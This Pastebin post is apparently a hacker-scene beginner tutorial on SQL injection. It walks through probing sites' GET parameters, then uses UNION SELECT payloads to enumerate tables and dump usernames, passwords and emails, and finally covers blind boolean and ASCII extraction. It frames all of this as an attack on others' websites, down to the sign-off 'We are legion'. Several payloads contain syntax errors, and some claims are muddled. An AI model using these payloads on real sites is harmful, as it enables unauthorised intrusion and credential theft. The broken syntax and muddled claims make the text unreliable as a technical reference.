Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- This is a beginners tutorial for SQL Injection written by
- p00l_b0y :)
- SQL stands for Structured Query Language and its a programming
- language designed by IBM that basically stores data for a server
- in a table, similar to using a table in spreadsheets. It is how the server
- will store the data. We can manipulate the database a website
- is using to store content using SQL injection, or as i will
- call it, sqli. The databases may contain usernames,user passwords,
- news articles, emails, and much more.. anything the server is storing.
- First you need to find a vulnerable site. There are tons of tools
- that can tell you if its vuln or not, but i will teach how to
- do it without a program, so you can understand it :)
- First you need to find out what features the database is using,
- like searches, registration or GET pages..
- this is what we will use, GET. Here is an example of how GET works...
- http://example.com/index.php?page=1.
- The '?' followed by a name and then a value is what is known as a GET.
- The GET here is telling the server to grab all the
- info under the name "1" and to display it on the web-page.
- So to get the data from "1" it must look it up in a database
- to show this info on the webpage so now we need to get this
- data from the database to see if its vuln. We can check by
- typing this...
- http://example.com?page=1--
- IF there is an error displayed then we can continue because
- this would tell an sql server to ignore the last tick.If
- there is no error then find another website. Also
- if it doesn't display anything then that doesn't mean
- its not vuln.
- there are several programs to use for sqli, the most popular are
- Havij, and SQLmap.
- NOTE:
- In this tutorial, i am not going to show you how to use a specific
- program, i am just going to show the basic outline of how sqli
- works so you can understand it and use it yourself. I MIGHT write
- a part 2 to this tut that shows how to use Havij, but i will see
- how this one goes first :)
- So there are three categories of data in a SQL database or server,
- They are, databases, tables, and columns.
- Databases contain tables, tables contain columns, columns
- contain information, the information we want.
- There are many different ways to get this info using differnet
- type of sql injections.
- -Blind sqli
- -Signature Evasion
- -Filter bypass
- -poorly filtered strings
- -incorrect type handling
- The first from of sql i will discuss
- in this tut is poorly filtered strings.
- Poorly filtered strings means that the web master
- did not do his job and didnt filter the GET info correctly, this
- creates a vuln for sqli.Now we will inject the sql query by first finding
- out how many columns it has.
- Remember, databases contain tables, tables contain columns, columns
- contain information, the information we want.
- http://example.com?page=1 ORDER BY 1--
- http://example.com?page=1 ORDER BY 2--
- http://example.com?page=1 ORDER BY 3--
- http://example.com?page=1 ORDER BY 4--
- We have an error when we type ORDER BY 4--
- so this tells us there is 3 columns of info, get it?
- So we can combine the statements together with a
- UNION statment, meaning combine them...
- http://example.com?page=1 UNION ALL SELECT 1,2--
- This will now display the number of columns in your
- screen, the number is displays is the number we use
- to exploit the site. Now we will need to see what version
- of sql the target is using to see if its vuln...
- http://example.com?page=1 UNION ALL SELECT 1,@@version--
- this will display the version of the database.
- if the version is above 5 that means it is a
- mysql database and still may be vuln. In this
- tutorial i will be exploiting column 1. Now we exploit
- the data from the mysql database by typing this...
- http://example.com?page=1 UNION ALL SELECT 1,table_name FROM information_schema.tables--
- this will display the current tables that may have the info we want
- so look for a table name that may have some precious info in it. Now we need to
- get the column names in which the info is stored..
- Remember, databases contain tables, tables contain columns, columns
- contain information, the information we want.
- http://example.com?page=1 UNION ALL SELECT 1,column)name FROM information_schema.columns WHERE table=[table]
- replace [table] with the name of the table you want.
- This should display all the columns in the table
- so look for a column called id, username, password, email etc.
- Passwords may be encrypted so use MD5 cracker to
- view it as plain text :) type this to open the column of
- a user and their password
- http://example.com?page=1 UNION ALL SELECT 1,concat(username,0x3a,password,0x3a,email) FROM [table]--
- So [table] is the table we are in, concat means
- to group them together (username, password)
- and 0x3a means ':' in hex so it displays
- all the bits that have the username and password.
- your output will look something like this...
- username:password:email
- The second form of sqli i will talk about in this
- tut is blind sqli. Some web-masters might try
- and hide then errors when you type
- http://example.com?page=1--
- So then we will use blind sqli :)
- This is called a blind sqli attack because
- you will not see any error messages, it is a
- different technique. WE are going to use
- benchmark() in this tut. so type this...
- http://example.com?page=1
- this should display the website, its true.
- http://example.com?page=1 and 1=1
- this should also display the website, its true.
- http://example.com?page=1 and 1=2
- this is not true, if it does not display the
- website normally then its vuln :)
- ( see how its called a blind sqli X) )
- Again, we will check the version of the database...
- http://example.com?page=1 substring(@@version,1,1)=5
- So this will return true if the database is version 5.
- NOTE: substring means part of a string...
- So we will continue if its version 5
- http://example.com/news.php?page=1 and (select 1 from mysql.user limit 0,1)=1
- If this doesnt work then you will have find another
- technique for blind sql, but if it works,
- then you can get more info.
- http://www.example.com/news.php?id=5 and (select 1 from [table] limit 0,1)=1
- Since this is a blind sqli, you will have to guess
- the table name, but web-masters are people too
- so try users,members,emails, usernames, etc.
- We are using limit 0,1 due to restrictions in the subselect.
- SO the fun part comes up next,guessing more tables
- and spamming the sql query :) FUN!
- http://example.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>80
- This will pull the first character from the first row of info,
- then convert it to an ascii value and compare against the value 80.
- If it comes back with true, use the 80. If its false then
- decrease the value 80 until its true. Keep doing this till you come to
- a point where an increase by 1 is true, and a decrease by 1 is false.
- You know have your character. Use an ASCII chart from Google to help.
- I will stop the tut here,its long enough.
- I am tired as balls so if you want to learn more
- ways of sqli like filter evasions and stuff, google it.
- I might make a part 2 to this tut if you guys like it :)
- We are legion.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement